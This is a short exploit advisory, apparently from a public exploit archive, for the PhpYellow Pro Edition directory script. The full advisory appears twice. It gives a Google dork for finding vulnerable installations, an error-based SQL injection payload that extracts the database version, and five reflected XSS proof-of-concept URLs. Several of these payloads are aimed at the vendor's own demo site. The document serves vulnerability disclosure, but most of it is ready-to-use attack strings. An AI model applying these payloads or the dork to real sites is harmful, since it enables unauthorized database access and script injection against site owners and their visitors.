##########################################
# Exploit Title: PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities
# Date: 2013-1-27
# Author: DaOne aka Mocking Bird
# Software Link: http://phpyellow.com/
# Category: webapps/php
# Price: $499.95
# Google dork: inurl:"/search/search4needles.php"
##########################################
# Error-Based SQL Injection:
-Exploit-
http://site/directory/search/search4needles.php?search=subindex&haystack=[error-based injection]&needle=1
-Demo-
http://phpyellow.com/directory/search/search4needles.php?search=subindex&haystack=(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)x)&needle=1
# Reflected XSS:
-Demo-
http://phpyellow.com/directory/search/alpha_cat.php?L="><script>alert(1)</script>
http://phpyellow.com/directory/modules/popular_cities/scripts/city.php?city="><script>alert(2)</script>
http://phpyellow.com/directory/search/search4needles.php?search=top+cities&haystack="><script>alert(3)</script>
http://phpyellow.com/directory/profile.php?listing_property=8&profile_item="><script>alert(4)</script>
http://phpyellow.com/directory/search/search_advanced.php?search="><script>alert(5)</script>
# Exploit Title: PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities
# Date: 2013-1-27
# Author: DaOne aka Mocking Bird
# Software Link: http://phpyellow.com/
# Category: webapps/php
# Price: $499.95
# Google dork: inurl:"/search/search4needles.php"
##########################################
# Error-Based SQL Injection:
-Exploit-
http://site/directory/search/search4needles.php?search=subindex&haystack=[error-based injection]&needle=1
-Demo-
http://phpyellow.com/directory/search/search4needles.php?search=subindex&haystack=(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)x)&needle=1
# Reflected XSS:
-Demo-
http://phpyellow.com/directory/search/alpha_cat.php?L="><script>alert(1)</script>
http://phpyellow.com/directory/modules/popular_cities/scripts/city.php?city="><script>alert(2)</script>
http://phpyellow.com/directory/search/search4needles.php?search=top+cities&haystack="><script>alert(3)</script>
http://phpyellow.com/directory/profile.php?listing_property=8&profile_item="><script>alert(4)</script>
http://phpyellow.com/directory/search/search_advanced.php?search="><script>alert(5)</script>
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.